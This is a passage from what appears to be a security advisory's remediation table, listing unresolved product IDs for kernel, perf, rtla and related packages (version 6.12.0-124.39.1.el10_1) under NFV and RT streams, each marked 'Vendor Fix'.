| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
